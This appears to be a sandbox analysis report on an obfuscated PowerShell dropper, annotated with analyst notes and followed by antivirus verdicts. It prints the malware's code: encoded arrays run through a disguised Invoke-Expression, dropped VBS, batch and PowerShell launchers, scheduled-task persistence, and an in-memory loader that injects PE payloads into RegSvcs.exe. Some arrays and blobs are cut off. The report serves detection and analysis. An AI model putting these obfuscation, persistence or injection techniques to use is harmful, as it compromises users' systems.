Static | ZeroBOX
No static analysis available.
# Analyst note (stage 1, staging directory):
# Each array element is read as a hexadecimal character code: bare numbers are
# stringified first, so 24 is treated as 0x24 ('$'). The joined text:
#   - binds the [IO.File] type to $a6p (used by the later WriteAllText calls),
#   - sets ${D} to C:\ProgramData\WindowsHolographicDrivers\regid.1991-07com.microsoft\,
#   - creates that directory with New-Item -Force and discards the output,
#   - sleeps for 9 seconds.
# The decoded text is piped to the command named by characters 4, 24 and 25 of
# %ComSpec%. With the default value C:\WINDOWS\system32\cmd.exe that spells
# "Iex" (Invoke-Expression), so the string "Invoke-Expression" never appears
# in the script.
# PowerShell variable names are case-insensitive, so ${D} here is the $d that
# the later file-write lines reference.
# Detection: script block logging (event ID 4104) records the decoded text when
# it is evaluated; the directory path above is a host indicator.
[STriNG]::Join( '', (( 24, 61,36 ,70 ,20, '3d', 20, '5b', 74, 79 , 70,65 , '5d', 28 , 22, 49,'4f', '2e' , 46 , 69 , '6c' ,65,22 , 29 ,'3b', 20, 24 ,'7b' ,44 ,'7d' ,20, '3d',20, 22 ,43 , '3a' , '5c', 50,72 ,'6f',67,72,61 , '6d',44 , 61 , 74,61 , '5c' ,57 , 69,'6e', 64 ,'6f', 77 ,73 , 48, '6f', '6c' , '6f' , 67 , 72,61, 70 ,68, 69,63,44 , 72, 69 , 76,65 , 72,73 ,'5c' , 72 , 65 , 67, 69 ,64, '2e', 31, 39 ,39,31 , '2d' , 30,37, 63 ,'6f' , '6d' ,'2e', '6d',69, 63 , 72 , '6f', 73,'6f',66, 74 , '5c' ,22, '3b', 20, '4e' ,65,77 ,'2d', 49, 74, 65,'6d', 20, '2d' , 49 ,74 ,65 ,'6d' , 54 ,79 , 70,65, 20 ,44,69 , 72 ,65,63 , 74 , '6f' ,72, 79 , 20 ,'2d' , 50, 61 , 74,68, 20, 24 , '7b' , 44 , '7d', 20 , '2d' ,46, '6f' , 72 , 63, 65 ,20 , '7c' , 20,'4f',75, 74 ,'2d','4e',75, '6c', '6c' ,'3b' , 20,53,74, 61 ,72 ,74, '2d', 53 ,'6c', 65,65,70,20, '2d',53, 65 , 63 ,'6f','6e',64 , 73,20 , 39 ) |FoREacH-OBJECt{ ( [ChAr] ( [cONVeRT]::toINt16( ($_.toStRinG()) ,16 ) ))} ))|& ( $env:coMspEc[4,24,25]-JOIn'')
${co`NT`ENt} =
(( 39, 13 , 10, 111 , 110 , 32 , 101, 114 , 114 , 111 , 114, 32 , 114, 101 , 115 , 117, 109 , 101 , 32, 110 , 101, 120 , 116 , 13 , 10, 83 , 117 , 98, 32, 122, 121, 110 , 105 , 116, 104 , 111 , 13, 10 , 32, 32, 32, 32 , 68, 105 , 109, 32 , 115, 117 , 98, 115, 116, 97, 105 , 110, 105, 110 , 103 , 13, 10, 32 , 32, 32 , 32, 83 , 101, 116, 32 , 115 , 117, 98 , 115 , 116 , 97, 105, 110, 105, 110 , 103 , 32 , 61, 32, 67 , 114, 101, 97, 116 , 101 , 79, 98, 106 , 101 , 99, 116 , 40 , 34, 87 , 83 , 99, 114, 105, 112 , 116, 46 , 83, 104 , 101, 108, 108, 34 , 41 , 13, 10 , 9, 115, 117, 98, 115, 116, 97 , 105, 110, 105, 110 , 103 , 46 , 82 , 117 , 110, 32 , 34, 67 , 58, 92 , 80, 114, 111, 103, 114, 97, 109, 68 , 97, 116, 97 , 92, 87 , 105 , 110 , 100, 111, 119, 115, 72 , 111, 108 , 111, 103, 114 , 97 , 112, 104 , 105 , 99, 68, 114, 105 , 118 , 101, 114 , 115, 92 , 114 , 101, 103, 105 , 100, 46, 49, 57, 57, 49 , 45 , 48, 55, 99 , 111 , 109 , 46, 109, 105 , 99, 114, 111, 115, 111, 102, 116, 92, 114 , 101, 103, 105, 100, 46
catch {}
# Analyst note (dropped file 1 of 3, VBScript launcher):
# Get-Variable ('a' + '6P') fetches variable a6P, and the format string
# "{1}{0}{3}{2}" reassembles the method name "WriteAllText". The call writes
# ${content} to <staging dir>\regid.1991-05com.microsoftVsLabs.vbs.
# The visible part of the decimal array assigned to ${content} above decodes
# to a VBScript that sets "on error resume next", creates a WScript.Shell
# object and calls its Run method on a path under the same staging directory.
# The listing is cut off before the Run target is complete.
# NOTE(review): the Run target is presumably the .bat written later in this
# script; confirm against the full sample.
# The visible part of the octal array near the end of this listing decodes to
# New-ScheduledTaskAction -Execute with this .vbs path, so this file is the
# scheduled-task target. Hunting for scheduled tasks whose action points into
# C:\ProgramData\WindowsHolographicDrivers\ covers the persistence step.
( geT-vARiaBlE ('a' + '6P')).vAluE::("{1}{0}{3}{2}" -f 'rite', 'W', 'llText', 'A').Invoke("$d\regid.1991-05com.microsoftVsLabs.vbs" , ${CO`N`TEnT})
try {
${CO`Nt`eNT} = [StRinG]::joIN( '', (( 39, 13, 10, 64 , 101, 99 , 104 , 111, 32, 111 , 102 , 102 , 13 , 10, 99 , 109, 100 , 32, 47 , 99, 32, 80, 111 , 119 , 101 , 114 , 115, 104 , 101, 108 , 108 , 32 , 45 , 78 , 111 , 80, 114, 111 , 102 , 105, 108 , 101 , 32 , 45 , 87, 105, 110, 100, 111, 119 , 83 , 116, 121 , 108, 101 , 32 , 72, 105 , 100, 100 , 101 , 110, 32 , 45 , 69 , 120, 101, 99 , 117 , 116, 105 , 111 , 110 , 80 , 111 , 108, 105, 99, 121, 32 , 66, 121, 112, 97 , 115 , 115, 32, 45, 78, 111 , 110, 73 , 110, 116 , 101, 114 , 97 , 99 , 116 , 105 , 118 , 101, 32, 34 , 67 , 58 , 92, 80, 114 , 111, 103 , 114, 97 , 109, 68 , 97 , 116 , 97, 92, 87 , 105, 110 , 100 , 111 , 119 , 115, 72, 111 , 108, 111, 103 , 114, 97 , 112, 104 , 105 , 99 , 68 , 114 , 105, 118, 101 , 114, 115, 92 , 114 , 101, 103, 105 , 100, 46 , 49 , 57 , 57 , 49, 45 , 48 , 55 , 99 , 111 , 109, 46, 109 , 105, 99, 114 , 111, 115, 111 , 102 , 116, 92 , 114, 101, 103 , 105, 100 , 46, 49, 57, 57 , 49, 45 , 48 , 53 , 99, 111, 109 , 46 , 109 , 105 ,
}
catch {}
# Analyst note (dropped file 2 of 3, batch launcher):
# "{0}{2}{1}" -f 'W', 'iteAllText', 'r' reassembles "WriteAllText". The call
# writes ${content} to <staging dir>\regid.1991-05com.microsoftVsEnhance.bat.
# The visible part of the decimal array assigned just above decodes to a batch
# file starting with "@echo off" that runs
#   cmd /c Powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -NonInteractive "<path>"
# where <path> starts in the staging directory; the listing is cut off
# mid-path.
# NOTE(review): the target is presumably the ...VsLabsData.ps1 file written
# later in this script; confirm against the full sample.
# Detection: that command line (hidden window, ExecutionPolicy Bypass, script
# path under C:\ProgramData\) is visible in process-creation telemetry.
( Get-VariaBlE A6p).VAluE::("{0}{2}{1}" -f 'W', 'iteAllText', 'r').Invoke("$d\regid.1991-05com.microsoftVsEnhance.bat" , ${CON`TE`Nt})
try {
${coNt`e`Nt} = @'
&("{1}{0}{2}{3}" -f'-V','Set','Aria','bLE') (("{0}{1}" -f 'jX','nY')+'r') ([tYPE]("{0}{1}{2}"-f("{0}{1}" -f'co','NV'),'E','RT')) ;try {
function R`EdRO {
param (${RED`Ro}) ${re`D`Ro} = ${Red`RO} -split ' ' | &('?') {${_}}
foreach(${R`Ed} in ${rE`d`RO} ){
( &("{3}{0}{1}{2}" -f 't-Va','r','IAbLe','Ge') (("{0}{1}" -f'JX','ny')+'R') -ValuEo )::("{1}{0}" -f ("{1}{0}" -f '2','oInt3'),'T')."InV`oKe"(${R`ed} , 16)
}
}
${en`HAN`cer} = '4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 3F 32 26 90 00 00 00 00 00 00 00 00 E0 00 0E 21 0B 01 30 00 00 22 01 00 00 06 00 00 00 00 00 00 4E 40 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 A0 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4B 00 00 00 00 60 01 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0C 00 00 00 BE 3F 01 00 1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
}catch{}
try {
${COnt`eNT} = '4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 15 21 DD D9 00 00 00 00 00 00 00 00 E0 00 0E 01 0B 01 30 00 00 5E 05 00 00 08 00 00 00 00 00 00 EE 7C 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 C0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 A0 7C 05 00 4B 00 00 00 00 80 05 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 A0 05 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
}
catch {}
try{
[byte[]]${n`eW} = &("{1}{2}{0}" -f 'O','RE','DR')(${c`o`NtEnT})
[byte[]]${N`E} = .("{2}{1}{0}" -f 'RO','ED','R')(${E`NHaNCeR})
}catch{}
try{
${P`Ath} = "C:\{0}\Microsoft.{1}\Framework\v4.0.30319\Re{2}cs.e{3}" -f ("{1}{2}{0}" -f 'ws','W',("{1}{0}"-f 'o','ind')) , 'NET' , 'gSv' , 'xe'
${XpANPy`E`Boszu`i`4Hd8`CYF} = [Reflection.Assembly]
${A`kMXUBbwN`FPQ2`T`HqK`oL6} = ("{1}{0}" -f'ad','Lo')
${ikc1`9ajSjFtuLDZR`B`42R} = 'Get'
${g`j9w0`HL`RRPTho`SBecN3c} = 'Invoke'
${Me`THoD} =${I`k`c19`AJsjFt`UldzRb42R} + ("{0}{1}"-f ("{1}{0}"-f'th','Me'),'od')
${i`3w`4V5`O`87GH`YC`gdSsJ1k} = ${i`kc`19A`jsJFt`ULD`zRB42r} +("{0}{1}"-f'Ty','pe')
${U`kw} = ("{2}{1}{0}"-f 'E','P',("{1}{2}{0}" -f'PE2.','N','ew'))
${SEe`Ee} = ${Xp`An`Pyeb`oSZuI`4HD8C`YF}::${akmXu`BbW`NfPq2Th`qk`OL6}(${Ne})
${XPAnpY`ebo`Sz`Ui`4HD`8c`YF} = ${SEE`eE}.${I3w`4`V5`o8`7gHyCG`Dssj1K}(${u`kW})
${XP`AnPy`EBOSz`Ui`4h`d8CYf} = ${xpanPy`EBOSzUI`4`H`d8cYF}.${m`eTHod}(("{1}{0}"-f'te',("{0}{1}" -f'Ex','ecu')))
${Xp`A`NPY`e`BOs`zuI4hD8C`yf} = ${Xpa`N`p`yE`B`OszUI4`HD8cyf}.${GJ9W0H`L`Rrp`THoSb`ecN3C}(${N`ULL} , [object[]](${pa`TH} , ${n`EW}))
}catch{}
try{}catch{}
try{}catch{}
'@
# Analyst note (dropped file 3 of 3, PowerShell loader):
# Writes the single-quoted here-string above (stored verbatim, no variable
# expansion) to <staging dir>\regid.1991-05com.microsoftVsLabsData.ps1.
# What that dropped script does, as far as this listing shows:
#   - Defines a helper that splits a space-separated hex string and converts
#     each token with [Convert]::ToInt32(token, 16).
#   - Holds two hex blobs (${enhancer} and ${content}) that both start with
#     4D 5A and carry a PE header with machine type 4C 01 (32-bit x86).
#     Characteristics is 0E 21 in ${enhancer} (DLL bit set) and 0E 01 in
#     ${content}. Both blobs are cut off in this report.
#   - Rebuilds every sensitive name from format strings: "Load", "GetType",
#     "GetMethod", "NewPE2.PE", "Execute", and the path
#     C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe.
#   - Calls [Reflection.Assembly]::Load on the ${enhancer} bytes, resolves
#     type NewPE2.PE and method Execute, and invokes it with the RegSvcs.exe
#     path and the ${content} bytes as arguments.
# NOTE(review): handing a signed host binary's path plus a PE byte array to
# an in-memory loader is consistent with process injection or hollowing into
# RegSvcs.exe. The loader's code is not visible here; confirm by analysing
# the ${enhancer} assembly.
# Detection: RegSvcs.exe started with powershell.exe as its parent, plus
# in-memory assembly loads recorded by AMSI or script block logging.
$a6p::("{0}{1}{2}{3}" -f 'W', 'ri', 'teA', 'llText').Invoke("$d\regid.1991-05com.microsoftVsLabsData.ps1" , ${cO`NTE`Nt})
}
catch {
}
( (44 , 141,143 ,164 ,151 ,157 , 156,40,75,40 , 116 , 145 ,167, 55,123,143, 150, 145 , 144 ,165, 154 , 145 ,144, 124 ,141 , 163 , 153 , 101 , 143,164, 151,157, 156 ,40,55,105, 170 , 145 , 143 ,165 , 164, 145 ,40 ,42,103, 72 ,134 ,120 , 162, 157 ,147 ,162 ,141 , 155 , 104 ,141 , 164 ,141,134 ,127 ,151 , 156 , 144,157,167 ,163, 110 ,157 ,154, 157 , 147 , 162 ,141,160 ,150 ,151, 143,104,162, 151 ,166 , 145 ,162 , 163 , 134 ,162 ,145 ,147, 151 ,144,56,61 ,71,71 ,61 , 55 , 60,67,143 ,157,155,56 ,155 , 151,143 , 162,157 , 163, 157, 146, 164, 134, 162, 145, 147, 151,144 ,56 ,61, 71, 71 ,61 , 55 , 60,65 , 143,157,155 ,56 ,155 ,151 , 143 ,162,157, 163 , 157,146 , 164 , 126, 163 ,114, 141,142 , 163 , 56,166,142 ,163, 42, 15 ,12, 44 , 164 ,162,151 ,147,147, 145, 162, 61 ,40 ,75 ,40 ,116, 145 ,167 , 55 ,123, 143, 150 ,145 ,144,165, 154 , 145 , 144 , 124, 141, 163 ,153, 124 , 162, 151 ,147 ,147 , 145, 162,40 ,55, 117, 156, 143,145 , 40, 55 ,101, 164, 40, 50, 107 ,145 , 164 ,55,104,141, 164,145,51 ,56, 101, 144, 144 ,115
catch {}
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
tehtris Clean
Cynet Clean
CTX txt.trojan.generic
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.Generic.37081089
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec ISB.Heuristic!gen39
ESET-NOD32 PowerShell/Kryptik.BO
TrendMicro-HouseCall Clean
Avast PwrSh:Iex-C [PUP]
ClamAV Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.Generic.37081089
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.Generic.37081089
Tencent Script.Trojan.Generic.Bkjl
Sophos Mal/PSDL-J
F-Secure Clean
DrWeb Clean
VIPRE Trojan.Generic.37081089
TrendMicro Clean
CMC Clean
Emsisoft Trojan.Generic.37081089 (B)
huorong VirTool/PS.Obfuscator.e
FireEye Trojan.Generic.37081089
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D235D001
SUPERAntiSpyware Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan.PowerShell.Crypt
MaxSecure Clean
GData Trojan.Generic.37081089
AVG PwrSh:Iex-C [PUP]
Panda Clean
alibabacloud Trojan:Win/Generic.Gen
No IRMA results available.